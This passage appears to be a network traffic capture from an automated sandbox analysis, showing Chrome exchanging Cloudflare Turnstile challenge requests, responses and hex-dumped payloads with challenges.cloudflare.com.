                                                        20192.168.2.449757104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:35 UTC638OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:35 UTC442INHTTP/1.1 400 Bad Request
                                                        Date: Tue, 25 Mar 2025 20:29:35 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 14
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        cf-chl-out: MV7x4wPLXdgnh4LWyHR8ubzauadZlkGruxmPEhMSISr8f1OS5mieowy1f2yxGsGkHk8KXut/9q30H/sO9/j47w==$b+10VSMSZdoP15kmqpzH5w==
                                                        Server: cloudflare
                                                        CF-RAY: 9261294b6f1ecef2-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:35 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 38 30 7d
                                                        Data Ascii: {"err":100280}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.449758104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:37 UTC856OUTGET /cdn-cgi/challenge-platform/h/b/pat/9261293dee55c468/1742934575128/d51fc97ff5482a0e04d34c34824eb01eb3128cda53b4a0f70f6023263fe47e26/uPY28BXx41_v6Yh HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:37 UTC143INHTTP/1.1 401 Unauthorized
                                                        Date: Tue, 25 Mar 2025 20:29:37 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        2025-03-25 20:29:37 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 31 52 5f 4a 66 5f 56 49 4b 67 34 45 30 30 77 30 67 6b 36 77 48 72 4d 53 6a 4e 70 54 74 4b 44 33 44 32 41 6a 4a 6a 5f 6b 66 69 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g1R_Jf_VIKg4E00w0gk6wHrMSjNpTtKD3D2AjJj_kfiYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                        2025-03-25 20:29:37 UTC1INData Raw: 4a
                                                        Data Ascii: J


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.449759104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:37 UTC827OUTGET /cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:38 UTC200INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:38 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 926129592a474408-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:38 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 07 08 02 00 00 00 87 a9 fa 6f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRoIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.449760104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:38 UTC468OUTGET /cdn-cgi/challenge-platform/h/b/d/9261293dee55c468/1742934575130/g4iWD1-kj0BtEfd HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:38 UTC200INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:38 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        Server: cloudflare
                                                        CF-RAY: 9261295c4a2df793-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:38 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 07 08 02 00 00 00 87 a9 fa 6f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRoIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.449761104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:38 UTC1191OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 39252
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-Type: text/plain;charset=UTF-8
                                                        cf-chl: 5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI
                                                        cf-chl-ra: 0
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:38 UTC16384OUTData Raw: 49 6d 6c 70 7a 66 36 53 72 48 6c 69 57 43 2b 36 6e 61 4d 30 6c 4c 77 61 6b 61 67 70 57 37 37 43 42 36 52 61 58 70 55 35 50 36 73 61 4d 37 66 35 36 54 61 78 31 61 36 72 37 6d 61 4b 61 43 37 57 55 24 63 61 6f 44 66 46 61 24 41 57 31 6a 59 61 48 57 36 4f 61 6c 72 61 33 67 36 42 75 47 4f 61 35 37 61 42 35 75 6c 6b 57 61 62 61 66 6e 34 61 4d 70 66 57 72 61 24 5a 57 61 48 61 6c 57 36 55 61 69 6d 61 49 49 48 66 54 56 31 61 49 63 6d 42 6c 38 36 61 64 61 55 42 61 4c 47 42 4c 4c 63 73 52 55 66 56 32 67 70 36 49 58 63 6c 44 6a 63 70 61 62 4b 36 31 55 61 36 38 61 75 35 6e 66 4b 6a 37 61 75 47 33 35 37 63 4a 6c 44 61 78 37 48 4b 6b 24 54 6c 7a 61 61 56 73 50 61 61 59 67 79 53 61 37 4d 6c 61 58 44 61 45 35 5a 37 38 61 55 2b 2b 38 37 42 4c 2d 44 36 64 35 70 61 64 32 37
                                                        Data Ascii: Imlpzf6SrHliWC+6naM0lLwakagpW77CB6RaXpU5P6saM7f56Tax1a6r7maKaC7WU$caoDfFa$AW1jYaHW6Oalra3g6BuGOa57aB5ulkWabafn4aMpfWra$ZWaHalW6UaimaIIHfTV1aIcmBl86adaUBaLGBLLcsRUfV2gp6IXclDjcpabK61Ua68au5nfKj7auG357cJlDax7HKk$TlzaaVsPaaYgySa7MlaXDaE5Z78aU++87BL-D6d5pad27
                                                        2025-03-25 20:29:38 UTC16384OUTData Raw: 5a 31 5a 46 59 66 4f 38 59 74 64 66 6b 24 36 4c 5a 37 6f 55 55 66 66 52 77 59 35 55 6d 6a 33 6d 53 71 79 55 76 4c 57 48 69 72 4b 70 41 72 46 44 42 49 72 51 42 6f 6a 68 6c 62 72 37 70 66 49 4a 76 2d 42 57 6b 48 36 4c 70 36 61 43 55 75 4e 6a 43 76 7a 30 6f 66 59 42 61 6f 69 70 75 6d 36 6a 6d 30 70 75 2d 42 50 68 43 32 6a 43 44 4d 61 53 62 30 6d 36 66 7a 69 2d 66 2d 72 6c 57 69 2d 36 24 69 53 67 43 74 37 69 36 59 61 35 37 43 63 36 66 44 30 37 69 49 57 44 61 31 37 75 55 70 58 61 57 37 75 51 42 51 51 75 33 4b 24 6e 4b 6d 30 78 36 48 69 6d 78 31 66 77 52 69 79 6e 7a 4b 70 54 42 56 6d 42 4b 4c 24 37 2b 70 38 6d 31 6b 44 2b 37 61 50 4b 34 37 52 5a 66 72 55 73 53 56 6d 59 6e 44 51 63 33 35 49 72 55 64 37 43 61 4c 44 7a 56 57 6a 44 30 71 66 69 61 66 44 43 49 61 77
                                                        Data Ascii: Z1ZFYfO8Ytdfk$6LZ7oUUffRwY5Umj3mSqyUvLWHirKpArFDBIrQBojhlbr7pfIJv-BWkH6Lp6aCUuNjCvz0ofYBaoipum6jm0pu-BPhC2jCDMaSb0m6fzi-f-rlWi-6$iSgCt7i6Ya57Cc6fD07iIWDa17uUpXaW7uQBQQu3K$nKm0x6Himx1fwRiynzKpTBVmBKL$7+p8m1kD+7aPK47RZfrUsSVmYnDQc35IrUd7CaLDzVWjD0qfiafDCIaw
                                                        2025-03-25 20:29:38 UTC6484OUTData Raw: 41 4b 4b 2b 31 24 41 41 78 52 54 62 4c 62 42 78 56 55 49 47 77 42 34 51 4d 43 48 41 41 55 4b 53 77 52 50 61 6c 39 5a 61 58 78 2b 62 52 61 39 72 53 56 75 72 66 79 61 39 34 47 57 36 45 41 62 34 38 57 36 4d 61 52 66 37 71 6d 74 70 4e 32 24 44 36 44 61 4a 7a 67 7a 75 6a 57 6e 50 4a 59 4e 39 49 66 79 30 37 66 58 74 35 42 67 6c 4a 33 31 46 71 35 6c 73 77 4b 52 71 37 74 55 63 46 52 68 4a 47 61 41 5a 70 67 39 54 66 50 4c 56 34 58 45 63 55 52 56 70 30 6a 58 47 6e 34 35 75 73 35 48 54 62 24 47 38 68 75 47 53 30 30 39 61 32 49 2b 69 43 43 58 2d 41 37 7a 30 6e 56 7a 61 39 4f 56 6b 75 45 6f 35 66 4a 57 4c 74 4e 77 32 4b 7a 4c 41 74 2b 4c 38 45 35 39 7a 75 70 36 45 69 7a 5a 66 61 42 37 66 4e 37 6e 75 50 24 46 54 47 35 34 49 4a 61 32 4b 32 37 49 44 61 69 24 43 2b 68 74
                                                        Data Ascii: AKK+1$AAxRTbLbBxVUIGwB4QMCHAAUKSwRPal9ZaXx+bRa9rSVurfya94GW6EAb48W6MaRf7qmtpN2$D6DaJzgzujWnPJYN9Ify07fXt5BglJ31Fq5lswKRq7tUcFRhJGaAZpg9TfPLV4XEcURVp0jXGn45us5HTb$G8huGS009a2I+iCCX-A7z0nVza9OVkuEo5fJWLtNw2KzLAt+L8E59zup6EizZfaB7fN7nuP$FTG54IJa2K27IDai$C+ht
                                                        2025-03-25 20:29:39 UTC322INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:39 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 28140
                                                        Connection: close
                                                        cf-chl-gen: b2x82DgV1sXisNmvjWHd7IRqHFhvvF6nSCpu6EgM0MhvrgIE36iuYsmZ5bbreY49$IG1dZcxxCHeXfJ7QV6MV6w==
                                                        Server: cloudflare
                                                        CF-RAY: 9261295e0f8e4e4d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:39 UTC1047INData Raw: 75 33 75 55 66 71 79 56 6c 34 36 7a 67 36 61 48 76 62 79 57 6d 71 54 4a 73 73 32 74 73 4b 37 52 73 62 4f 55 6c 38 53 33 6c 62 79 37 32 35 50 43 6e 38 4b 76 31 74 66 49 76 37 37 63 71 4d 33 6f 70 65 54 71 37 61 6e 69 36 72 62 43 39 75 61 77 78 63 53 36 37 39 6f 42 7a 2f 50 61 39 62 33 57 35 4f 51 4c 78 51 48 4c 79 65 73 47 34 75 2f 36 44 78 4d 43 41 68 6e 31 42 67 6f 54 37 4f 63 61 43 65 6a 35 2b 67 51 67 35 43 50 36 33 69 41 41 39 4f 73 61 4b 43 45 48 4a 52 30 69 37 79 34 4d 4b 7a 49 54 43 52 41 4c 4e 41 30 73 2b 54 6b 4e 48 6a 6b 6a 44 30 41 56 4a 53 45 61 50 45 6c 41 52 54 74 53 52 53 30 68 56 46 56 48 51 54 63 52 56 45 70 5a 59 42 39 50 55 78 6b 73 4c 55 49 78 48 6d 70 58 4b 52 35 63 53 46 63 69 62 47 74 30 5a 32 4e 4b 61 45 42 72 59 30 77 36 5a 6b 64
                                                        Data Ascii: u3uUfqyVl46zg6aHvbyWmqTJss2tsK7RsbOUl8S3lby725PCn8Kv1tfIv77cqM3opeTq7ani6rbC9uawxcS679oBz/Pa9b3W5OQLxQHLyesG4u/6DxMCAhn1BgoT7OcaCej5+gQg5CP63iAA9OsaKCEHJR0i7y4MKzITCRALNA0s+TkNHjkjD0AVJSEaPElARTtSRS0hVFVHQTcRVEpZYB9PUxksLUIxHmpXKR5cSFcibGt0Z2NKaEBrY0w6Zkd
                                                        2025-03-25 20:29:39 UTC1369INData Raw: 46 6a 72 2b 52 69 5a 4b 72 6c 37 47 7a 79 4a 6e 62 31 39 2b 74 7a 39 71 33 32 36 62 55 33 4c 6e 6e 36 64 32 73 36 37 43 39 33 63 50 42 34 76 61 30 7a 38 72 54 75 4f 54 77 39 62 33 4b 2b 76 7a 38 7a 67 66 38 7a 2f 33 4a 43 4d 50 64 31 67 6e 36 43 76 41 4f 33 76 33 67 46 4e 58 57 2b 52 73 46 32 76 33 65 33 64 6e 54 49 2f 62 61 42 51 51 51 47 50 77 6a 34 65 67 6f 2b 67 48 35 42 68 49 54 4a 44 41 4f 46 67 6f 6e 47 2f 4d 38 4b 53 67 39 45 43 33 34 47 7a 59 41 50 43 45 56 41 52 67 5a 4f 30 35 49 42 7a 77 61 4c 44 41 69 4a 44 41 4f 4c 42 45 72 56 41 39 51 4f 30 35 4e 56 57 52 42 4e 54 49 79 4e 6a 78 58 4e 6c 74 58 52 6a 31 49 55 55 52 68 4c 47 46 76 55 30 39 70 63 48 78 76 55 32 35 7a 50 56 74 74 65 33 78 6c 67 32 4a 46 67 47 5a 4a 57 49 57 41 69 47 5a 6c 59 56
                                                        Data Ascii: Fjr+RiZKrl7GzyJnb19+tz9q326bU3Lnn6d2s67C93cPB4va0z8rTuOTw9b3K+vz8zgf8z/3JCMPd1gn6CvAO3v3gFNXW+RsF2v3e3dnTI/baBQQQGPwj4ego+gH5BhITJDAOFgonG/M8KSg9EC34GzYAPCEVARgZO05IBzwaLDAiJDAOLBErVA9QO05NVWRBNTIyNjxXNltXRj1IUURhLGFvU09pcHxvU25zPVtte3xlg2JFgGZJWIWAiGZlYV
                                                        2025-03-25 20:29:39 UTC1369INData Raw: 30 4c 50 59 75 73 32 78 73 4d 71 31 76 35 72 45 35 72 79 6b 35 4e 62 48 77 38 37 76 76 2b 6d 6e 78 4b 58 65 72 72 44 54 77 62 44 48 38 66 61 38 32 37 6e 64 41 75 76 38 35 65 45 46 30 67 44 32 2f 66 76 65 42 66 7a 42 2f 4e 33 51 38 52 54 4c 42 2f 63 42 37 2f 54 72 42 65 77 4e 37 78 33 30 39 51 45 64 4a 2f 55 5a 41 50 51 71 46 67 63 4d 37 43 6f 76 36 42 38 6e 38 41 59 30 4a 2b 38 47 39 79 73 46 2b 41 6f 38 4c 68 37 37 4d 78 55 77 49 52 38 69 47 6b 67 39 50 78 6c 50 51 42 34 4b 49 6a 49 52 49 6c 4e 53 56 46 55 62 4d 69 35 63 45 54 5a 4c 55 56 74 64 52 54 70 55 58 6a 30 33 58 7a 78 6a 54 6c 35 44 59 32 41 76 50 69 64 49 61 47 52 53 5a 6d 73 33 65 57 68 75 54 47 46 30 64 6b 38 2f 5a 44 39 43 5a 56 4e 5a 53 32 46 6c 54 49 74 76 63 33 35 77 6b 56 42 30 5a 6c 46
                                                        Data Ascii: 0LPYus2xsMq1v5rE5ryk5NbHw87vv+mnxKXerrDTwbDH8fa827ndAuv85eEF0gD2/fveBfzB/N3Q8RTLB/cB7/TrBewN7x309QEdJ/UZAPQqFgcM7Cov6B8n8AY0J+8G9ysF+Ao8Lh77MxUwIR8iGkg9PxlPQB4KIjIRIlNSVFUbMi5cETZLUVtdRTpUXj03XzxjTl5DY2AvPidIaGRSZms3eWhuTGF0dk8/ZD9CZVNZS2FlTItvc35wkVB0ZlF
                                                        2025-03-25 20:29:39 UTC1369INData Raw: 4a 71 62 75 65 4c 6c 6e 70 32 7a 74 37 72 6f 37 64 32 34 79 62 76 50 78 37 76 79 7a 36 2b 33 77 65 33 72 38 2b 7a 76 7a 4e 48 62 30 39 50 63 38 4e 76 6c 34 64 58 46 77 4f 7a 4c 42 65 54 62 7a 76 41 54 37 4f 72 6f 42 4f 59 50 38 75 66 38 42 2b 72 6d 38 41 48 73 39 39 77 4e 44 68 4d 54 41 75 62 70 49 4e 34 42 4a 78 6b 4c 41 53 4c 72 43 52 45 79 46 51 73 6d 4a 67 62 30 4c 53 73 50 46 79 38 36 51 7a 63 2f 42 69 45 6c 42 45 77 4a 53 43 55 37 50 41 67 6f 4b 41 34 72 4e 31 45 79 4f 43 34 56 48 46 63 35 4c 6b 78 62 47 43 41 67 55 46 52 42 59 69 68 55 51 31 70 6b 61 6b 31 74 50 7a 4a 6f 4d 79 78 76 52 32 70 53 4d 57 6c 62 58 47 39 67 55 46 4a 31 50 45 77 39 67 6b 5a 67 64 34 52 64 5a 47 6c 34 52 5a 43 4b 55 56 32 49 69 59 4b 52 59 47 39 37 6d 5a 61 5a 62 33 6d 54
                                                        Data Ascii: JqbueLlnp2zt7ro7d24ybvPx7vyz6+3we3r8+zvzNHb09Pc8Nvl4dXFwOzLBeTbzvAT7OroBOYP8uf8B+rm8AHs99wNDhMTAubpIN4BJxkLASLrCREyFQsmJgb0LSsPFy86Qzc/BiElBEwJSCU7PAgoKA4rN1EyOC4VHFc5LkxbGCAgUFRBYihUQ1pkak1tPzJoMyxvR2pSMWlbXG9gUFJ1PEw9gkZgd4RdZGl4RZCKUV2IiYKRYG97mZaZb3mT
                                                        2025-03-25 20:29:39 UTC1369INData Raw: 69 61 30 71 6d 68 77 36 58 57 70 2b 6e 6e 30 74 47 71 37 4e 62 56 74 4d 57 79 75 76 66 34 75 4c 48 52 41 4c 7a 54 38 73 50 45 43 64 76 70 32 39 50 35 2b 77 58 33 37 68 50 4c 37 77 73 48 44 65 51 45 38 2f 50 54 37 2b 63 58 2b 77 30 61 37 77 30 41 42 51 49 49 47 65 51 66 35 2f 33 6d 42 43 30 79 48 65 67 43 4b 77 51 34 49 77 73 36 4c 7a 45 36 42 7a 73 61 4f 67 39 44 47 53 51 57 4a 52 30 5a 41 6b 6b 71 4e 79 51 34 50 54 34 49 48 43 77 78 55 56 67 6f 57 6b 38 6b 57 44 31 54 54 45 6f 58 4d 57 51 38 52 53 39 49 50 53 49 6f 51 31 59 38 58 56 78 44 51 79 39 4e 58 44 4a 76 62 48 42 7a 59 30 67 38 63 31 78 35 56 30 74 51 4f 56 74 67 67 6b 57 43 61 58 39 73 52 6e 78 4d 62 6d 52 71 59 32 4f 4d 58 6f 70 33 54 32 36 58 69 70 5a 78 61 46 74 6f 66 58 4e 39 68 56 74 6b 6f
                                                        Data Ascii: ia0qmhw6XWp+nn0tGq7NbVtMWyuvf4uLHRALzT8sPECdvp29P5+wX37hPL7wsHDeQE8/PT7+cX+w0a7w0ABQIIGeQf5/3mBC0yHegCKwQ4Iws6LzE6BzsaOg9DGSQWJR0ZAkkqNyQ4PT4IHCwxUVgoWk8kWD1TTEoXMWQ8RS9IPSIoQ1Y8XVxDQy9NXDJvbHBzY0g8c1x5V0tQOVtggkWCaX9sRnxMbmRqY2OMXop3T26XipZxaFtofXN9hVtko
                                                        2025-03-25 20:29:39 UTC1369INData Raw: 48 79 71 4c 4b 78 71 33 48 36 50 62 50 74 4d 48 70 30 39 7a 56 75 50 66 37 74 37 2f 68 39 4e 50 35 31 2b 62 38 2f 4e 73 4e 36 66 34 47 36 74 37 64 42 73 62 2b 44 76 4d 56 44 77 7a 73 36 68 41 49 2b 52 77 42 44 2b 34 6d 42 78 6a 67 4a 66 48 36 39 76 62 6a 35 53 34 63 2b 51 7a 72 42 66 41 59 4a 76 55 49 4a 41 6e 38 50 44 51 7a 4f 42 73 5a 2f 42 6f 5a 50 30 45 65 42 6b 41 2f 47 69 41 74 48 7a 6c 4d 54 79 4d 32 4c 56 4a 57 4a 56 73 6d 4f 79 78 62 58 6a 68 66 55 6a 55 73 55 69 56 6f 55 31 55 6e 4f 55 31 63 62 47 39 4c 62 47 52 67 50 31 45 2b 63 58 4e 61 57 6c 78 5a 64 56 39 7a 64 6e 56 52 62 48 6c 4f 65 59 43 41 66 46 4d 39 57 6f 61 50 57 55 31 6e 61 58 39 74 63 33 4b 4f 6b 47 5a 76 65 32 68 56 66 48 69 5a 64 35 75 61 6d 46 2b 51 63 48 70 67 5a 4b 56 35 6e 71
                                                        Data Ascii: HyqLKxq3H6PbPtMHp09zVuPf7t7/h9NP51+b8/NsN6f4G6t7dBsb+DvMVDwzs6hAI+RwBD+4mBxjgJfH69vbj5S4c+QzrBfAYJvUIJAn8PDQzOBsZ/BoZP0EeBkA/GiAtHzlMTyM2LVJWJVsmOyxbXjhfUjUsUiVoU1UnOU1cbG9LbGRgP1E+cXNaWlxZdV9zdnVRbHlOeYCAfFM9WoaPWU1naX9tc3KOkGZve2hVfHiZd5uamF+QcHpgZKV5nq
                                                        2025-03-25 20:29:39 UTC1369INData Raw: 71 2b 72 54 34 39 66 51 2f 50 76 50 31 4c 61 35 33 66 47 2f 37 4f 54 35 31 39 48 54 2f 74 76 4c 79 76 37 67 2f 4e 6b 43 39 50 58 54 42 66 66 67 31 67 7a 6d 32 51 2f 30 32 74 6b 43 45 64 2f 39 37 78 37 7a 32 69 55 48 34 77 49 4a 44 66 77 4f 45 52 41 42 46 68 41 52 4b 66 51 56 46 53 34 34 45 52 77 7a 49 69 4d 67 4e 79 59 68 48 6a 73 6d 4a 43 67 2b 53 43 73 73 48 53 34 77 4d 54 45 70 43 44 51 30 56 44 59 33 46 43 34 34 4f 52 68 4d 51 30 41 2f 49 54 6c 46 4e 54 34 39 52 56 39 67 53 55 30 39 54 53 52 50 4c 47 42 51 55 57 70 30 57 31 64 75 65 46 46 63 57 7a 31 65 59 48 64 77 59 32 56 56 5a 6d 6c 70 61 57 35 67 5a 6f 4e 71 5a 48 46 78 5a 6e 64 31 5a 58 5a 32 65 47 6c 78 55 48 78 39 6b 48 36 41 6c 34 4a 34 67 32 42 36 66 49 65 64 61 59 75 4c 61 49 4b 52 6a 57 75
                                                        Data Ascii: q+rT49fQ/PvP1La53fG/7OT519HT/tvLyv7g/NkC9PXTBffg1gzm2Q/02tkCEd/97x7z2iUH4wIJDfwOERABFhARKfQVFS44ERwzIiMgNyYhHjsmJCg+SCssHS4wMTEpCDQ0VDY3FC44ORhMQ0A/ITlFNT49RV9gSU09TSRPLGBQUWp0W1dueFFcWz1eYHdwY2VVZmlpaW5gZoNqZHFxZnd1ZXZ2eGlxUHx9kH6Al4J4g2B6fIedaYuLaIKRjWu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.449762104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:39 UTC638OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:39 UTC442INHTTP/1.1 400 Bad Request
                                                        Date: Tue, 25 Mar 2025 20:29:39 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 14
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
